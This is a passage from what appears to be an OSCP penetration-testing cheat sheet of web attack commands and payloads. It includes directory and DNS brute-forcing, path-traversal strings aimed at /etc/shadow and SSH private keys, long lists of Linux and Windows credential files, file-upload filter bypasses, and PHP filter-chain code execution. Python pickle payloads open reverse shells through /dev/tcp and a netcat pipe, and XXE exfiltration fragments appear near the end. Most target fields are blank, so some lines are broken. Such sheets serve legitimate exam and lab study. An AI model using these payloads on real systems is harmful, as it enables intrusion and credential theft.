dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u
https://:/ -b 200 -k --wildcard gobuster dir -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u
http:///api/ -e -s 200 OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 37 of 128
DNS Recon

gobuster dns -d -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster dns -d -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt

VHost Discovery

gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

Specify User Agent

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// -a Linux

Local File Inclusion (LFI)

http:///.php?file=
http:///.php?file=../../../../../../../../etc/passwd
http:////php?file=../../../../../../../../../../etc/passwd

Until php 5.3

http:////php?file=../../../../../../../../../../etc/passwd%00

Null Byte

%00
0x00

Encoded Traversal Strings

../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\

php://filter Wrapper

https://tinyurl.com/yux6oqdu
https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion
https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion#wrapper-phpfilter

url=php://filter/convert.base64-encode/resource=file:////var/www//api.php

http:///index.php?page=php://filter/convert.base64-encode/resource=index
http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
base64 -d .php

Django, Rails, or Node.js Web Application Header Values

Accept: ../../../../.././../../../../etc/passwd{{
Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A
Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{
Accept: ../../../../.././../../../../etc/passwd{%0A{{
Accept: ../../../../.././../../../../etc/passwd{%00{{

Linux Files

/etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf /etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow /etc/at.deny
/etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny
/etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts
/etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf
/etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log
/etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini
/etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/knockd.conf /etc/lighttpd.conf
/etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release
/etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf
/etc/network/interfaces /etc/networks /etc/npasswd
/etc/passwd /etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini
/etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini
/etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini
/etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf
/etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-release
/etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config
/etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf
/etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-ftpd.log
/logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf /opt/xampp/etc/php.ini /proc/cmdline
/proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules
/proc/mounts /proc/net/arp /proc/net/tcp /proc/net/udp /proc//cmdline /proc//maps
/proc/sched_debug /proc/self/cwd/app.py /proc/self/environ /proc/self/net/arp /proc/stat
/proc/swaps /proc/version /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini
/usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini
/usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log
/usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini
/usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl
/var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log
/var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log
/var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log
/var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log
/var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log
/var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log
/var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog
/var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog
/var/log/exim/rejectlog /var/log/faillog /var/log/ftplog
/var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log
/var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log
/var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log
/var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message
/var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog
/var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root
/var/webmin/miniserv.log /var/www/html/__init__.py /var/www/html/db_connect.php
/var/www/html/utils.php /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log
/var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history
~/.bash_history
~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history
~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa
~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc
~/.Xresources ~/.xsession

Windows Files

C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system
C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

PDF PHP Inclusion

Create a file with a PDF header, which contains PHP code.

%PDF-1.4

http:///index.php?page=uploads/.pdf%00&cmd=whoami

PHP Upload Filter Bypasses

.sh
.cgi
.inc
.txt
.pht
.phtml
.phP
.Php
.php3
.php4
.php5
.php7
.pht
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.jpeg
.php%20
.php%0d%0a.jpg
.php%0a
.php.jpg
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg

mv .jpg .php\x00.jpg

PHP Filter Chain Generator

https://tinyurl.com/yv3gjun7

python3 php_filter_chain_generator.py --chain ''
python3 php_filter_chain_generator.py --chain ""
python3 php_filter_chain_generator.py --chain """"""
python3 php_filter_chain_generator.py --chain """"""""
python3 php_filter_chain_generator.py --chain """"""""

http:///?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4

python3 php_filter_chain_generator.py --chain ''
[+] The following gadget chain will generate the following code : (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=

PHP Generic Gadget Chains (PHPGGC)

phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/.txt /PATH/TO/FILE/.txt

Server-Side Request Forgery (SSRF)

https:///item/2?server=server./file?id=9&x=

Server-Side Template Injection (SSTI)

Fuzz String

https://tinyurl.com/ypta53z7

${{ -->

command: chmod +s /bin/bash

Exploit Skeleton
Python Script

#!/usr/bin/python
import socket,sys

address = '127.0.0.1'
port = 9999
buffer = #TBD

try:
    print '[+] Sending buffer'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((address,port))
    s.recv(1024)
    s.send(buffer + '\r\n')
except:
    print '[!] Unable to connect to the application.'
    sys.exit(0)
finally:
    s.close()

JSON POST Request

POST / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 95
Connection: close

{
  "auth":{
    "name":"",
    "password":""
  },
  "filename":""
}

Python Pickle RCE

import base64
import pickle
import os

class RCE:
    # pickle calls os.system(cmd) when the object is deserialized
    def __reduce__(self):
        cmd = ("/bin/bash -c 'exec bash -i &>/dev/tcp// <&1'")
        return os.system, (cmd, )

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.b64encode(pickled))

import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

print(base64.b64encode(pickle.dumps(rce())))

Python Redirect for SSRF

#!/usr/bin/python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', sys.argv[1])
        self.end_headers()

HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()

sudo python3 redirect.py https://tinyurl.com/yjs6w2

#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import sys
import argparse

def redirect_handler_factory(url):
    """
    returns a request handler class that redirects to supplied `url`
    """
    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
        def do_GET(self):
            self.send_response(301)
            self.send_header('Location', url)
            self.end_headers()

        def do_POST(self):
            self.send_response(301)
            self.send_header('Location', url)
            self.end_headers()

    return RedirectHandler

def main():
    parser = argparse.ArgumentParser(description='HTTP redirect server')
    parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
    parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
    parser.add_argument('redirect_url', action="store")

    myargs = parser.parse_args()

    redirect_url = myargs.redirect_url
    port = myargs.port
    host = myargs.ip

    redirectHandler = redirect_handler_factory(redirect_url)

    handler = SocketServer.TCPServer((host, port), redirectHandler)
    print("serving at port %s" % port)
    handler.serve_forever()

if __name__ == "__main__":
    main()

Python Web Request

import requests
import re

http_proxy = "https://tinyurl.com/hdorn"
proxyDict = {
    "http" : http_proxy,
}

# get a session
r = requests.get('http://')
# send request
r = requests.post('', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)

XML External Entity (XXE)

Request

SYSTEM "http:///.dtd">%;]> GET / ;

Content of .dtd

%eval; %exfiltrate;
